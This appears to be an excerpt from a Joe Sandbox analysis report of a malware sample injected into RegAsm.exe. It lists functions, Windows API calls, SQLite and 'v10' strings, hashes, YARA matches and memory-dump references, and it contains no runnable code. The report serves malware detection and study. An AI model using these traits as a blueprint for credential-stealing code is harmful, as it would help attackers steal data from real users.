                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: 9f3ef0bbe607b4a7bbce938403eb38d09df0d8cd2159e7023eeb3c71293fe561
                                                    • Instruction ID: 0c420c2edcd7442bec5177bc0900443911c702f2a1ff881e0d9565c27a538d8d
                                                    • Opcode Fuzzy Hash: 9f3ef0bbe607b4a7bbce938403eb38d09df0d8cd2159e7023eeb3c71293fe561
                                                    • Instruction Fuzzy Hash: D9216B26594B905AC321DF289D80AE3BFF2AF19310B55489CE9D787796F23EF481C750
                                                    Function 1FA433C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1FA433D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
                                                    • API String ID: 0-1935849370
                                                    • Opcode ID: 150ca17be2a29a5efca67e938e419d4d43e79b145aaca566c1c578603ec5a9d6
                                                    • Instruction ID: 4a1d1c2f57540eccf7b98ac80db239fcd97eb07a3a2989fa799f679c7d7004c8
                                                    • Opcode Fuzzy Hash: 150ca17be2a29a5efca67e938e419d4d43e79b145aaca566c1c578603ec5a9d6
                                                    • Instruction Fuzzy Hash: 0201C0397003164AD301DF19E800BCAB3E9AFC5311F598166F6008B240EBBCA5878BA1
                                                    Function 1FBD5BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B9D937CE,?,?,00000000,1FC2D1CB,000000FF,?,1FBD5B30,?,?,1FBD5ADF,?), ref: 1FBD5BF6
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1FBD5C08
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,1FC2D1CB,000000FF,?,1FBD5B30,?,?,1FBD5ADF,?), ref: 1FBD5C2A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: b8fa66583753779edff245f13eb0a6770a8b2b2dcb95715aa52b1b4579f416e2
                                                    • Instruction ID: 7a9037e6b6e4763c0beaea79b6b27843cfb9cd503c5395325c83cdc156e755d0
                                                    • Opcode Fuzzy Hash: b8fa66583753779edff245f13eb0a6770a8b2b2dcb95715aa52b1b4579f416e2
                                                    • Instruction Fuzzy Hash: BE01673291862AEFDB018F55CD44BEEB7B8FF44B75F000965F912A2680DB799510DA90
                                                    Function 1FAAAF80 Relevance: 7.8, APIs: 5, Instructions: 277COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42cf1a4675cf128a422e1476e4354bff11dd01de658a3acbdbee9ab401a984b7
                                                    • Instruction ID: 8ea2d149d0737e8948a14406486ce3256fafcec75d356dd073eabbf61453cb7e
                                                    • Opcode Fuzzy Hash: 42cf1a4675cf128a422e1476e4354bff11dd01de658a3acbdbee9ab401a984b7
                                                    • Instruction Fuzzy Hash: 72A18570904622DBDB109F26D988A9B3765BF00BB9B080555EB0593340E73FF578EBA2
                                                    Function 00416F6B Relevance: 7.6, APIs: 5, Instructions: 112registrystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 00416F90
                                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?), ref: 00416FAE
                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 00416FD0
                                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00416FFE
                                                    • lstrcatA.KERNEL32(?), ref: 00417011
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$OpenQueryValuememset
                                                    • String ID:
                                                    • API String ID: 558315959-0
                                                    • Opcode ID: 2b23cf20a6915feefb30169c982cba133cbc5f6bbf25386db7298262db862196
                                                    • Instruction ID: 1de54068e5bc169fdd6954bc23f083257234ce87a1e24d317438506600201b0e
                                                    • Opcode Fuzzy Hash: 2b23cf20a6915feefb30169c982cba133cbc5f6bbf25386db7298262db862196
                                                    • Instruction Fuzzy Hash: 65414D7290010CABDF11EFA0DC47FDD7B7DAB09308F4014AABA14E60A1E674A7D88B95
                                                    Function 00408093 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memcmp.MSVCRT ref: 004080AD
                                                    • memset.MSVCRT ref: 004080DF
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0040812D
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                    • String ID: @$v10
                                                    • API String ID: 1400469952-24753345
                                                    • Opcode ID: 5c11e2cf27205c83e23cddbccf56b770aa3bdc7adb662c8a209098fc9e140871
                                                    • Instruction ID: cf5e1fffe8cf90e5f03da158ad632e0568caa3101dc4bf3db6ca4aeb35450b29
                                                    • Opcode Fuzzy Hash: 5c11e2cf27205c83e23cddbccf56b770aa3bdc7adb662c8a209098fc9e140871
                                                    • Instruction Fuzzy Hash: 09410570A1021CEFDF04DFA4D845BED7BB5AF10308F44402AF915AA2A1DB79AA95CB58
                                                    Function 004133A2 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 35stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrStrA.SHLWAPI(?,?,?,?,00414C10,?,00000000), ref: 004133AC
                                                    • lstrcpyn.KERNEL32(00640E18,?,?), ref: 004133CF
                                                    • lstrlenA.KERNEL32(?), ref: 004133E5
                                                    • wsprintfA.USER32 ref: 00413403
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpynlstrlenwsprintf
                                                    • String ID: %s%s
                                                    • API String ID: 1206339513-3252725368
                                                    • Opcode ID: 3b9d8486c6eaff2a35a03c37f78c6977d3381446056c5f2941719636820ff3ad
                                                    • Instruction ID: 12116c1aee8d4de8b7dc534b27fca2d5501c673fe986d8d967588ee95cbb9010
                                                    • Opcode Fuzzy Hash: 3b9d8486c6eaff2a35a03c37f78c6977d3381446056c5f2941719636820ff3ad
                                                    • Instruction Fuzzy Hash: 1601E436500118FFDF00DFA8CE49A9D7FB6EF06345F148450F9059A211C771EBA19B94
                                                    Function 00423605 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00423611
                                                      • Part of subcall function 00422B51: __getptd_noexit.LIBCMT ref: 00422B54
                                                      • Part of subcall function 00422B51: __amsg_exit.LIBCMT ref: 00422B61
                                                    • __getptd.LIBCMT ref: 00423628
                                                    • __amsg_exit.LIBCMT ref: 00423636
                                                    • __lock.LIBCMT ref: 00423646
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0042365A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 49346eb62c446a655feb5a0eac440022eec0b4581d1d25fa82309c5cdfa4abfe
                                                    • Instruction ID: bbbb7f88eece9b8eff46103b0d9cec543337986492c1c7e584355760c7d6d492
                                                    • Opcode Fuzzy Hash: 49346eb62c446a655feb5a0eac440022eec0b4581d1d25fa82309c5cdfa4abfe
                                                    • Instruction Fuzzy Hash: F5F04F31B40230AAD631BF65B80774A76A4AB10B19FD1015FE8145B6A2CB7C5A419A5E
                                                    Function 0041ACB7 Relevance: 7.5, APIs: 6, Instructions: 16sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: b02db4692aa35bd8b468f3e03022c02afafbc5dbc8388bcb26ba092ba05011e8
                                                    • Instruction ID: d1551ad88b94cc18e380d1906aab654feac824b564e6de5521e5d7017a5f30b9
                                                    • Opcode Fuzzy Hash: b02db4692aa35bd8b468f3e03022c02afafbc5dbc8388bcb26ba092ba05011e8
                                                    • Instruction Fuzzy Hash: BDE096356E120EDFDB006BE0AC2EBE83625AB17706F155025B31E9C0F1CAB481C4AF31
                                                    Function 1FB473C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • fts5: syntax error near "%.*s", xrefs: 1FB4751C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fts5: syntax error near "%.*s"
                                                    • API String ID: 0-498961494
                                                    • Opcode ID: f79cee356bd8c8465272f183d71a7bfe7f95abe7d4b02f928cf6063ca3d85323
                                                    • Instruction ID: 6001a467074b1e48046513d9530cb4582f93716c9cc86954c95a39cc9ef1d9bc
                                                    • Opcode Fuzzy Hash: f79cee356bd8c8465272f183d71a7bfe7f95abe7d4b02f928cf6063ca3d85323
                                                    • Instruction Fuzzy Hash: ACB1EFB04083528FD710CF24EA80B9ABBE4EF44358F64495DF9868B340E375F545EB96
                                                    Function 1FA3F7F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: integer overflow
                                                    • API String ID: 0-1678498654
                                                    • Opcode ID: 42a79bbc8a4e89401ae6e71fb53b6cddf5a40045d1ac633f9b501676c9f0b1c0
                                                    • Instruction ID: 931262d20e0348102c43efc6b07043a0945b3eb2d75cc4187b09e5000403b163
                                                    • Opcode Fuzzy Hash: 42a79bbc8a4e89401ae6e71fb53b6cddf5a40045d1ac633f9b501676c9f0b1c0
                                                    • Instruction Fuzzy Hash: 9B115639C047116EDB05AF24FD00B8A37E85F06321F050389E4981A1AAF73CE1C6C3C2
                                                    Function 1FA37D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: winShmMap1$winShmMap2$winShmMap3
                                                    • API String ID: 0-3826999013
                                                    • Opcode ID: 654d65202e19e15e166699e2144823e4be9424cb92cdfd4d023e8bfae6f7848b
                                                    • Instruction ID: 6a96e6a4382abb2606bed2b3fe6ee783cb4b40f2c980adf7e9332a90e2e5da3b
                                                    • Opcode Fuzzy Hash: 654d65202e19e15e166699e2144823e4be9424cb92cdfd4d023e8bfae6f7848b
                                                    • Instruction Fuzzy Hash: 2561DC719087029FDB10CF25CC81A67BBE5BF84752F0049ADE98297251EB3DF815CB62
                                                    Function 1FBD0FC2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
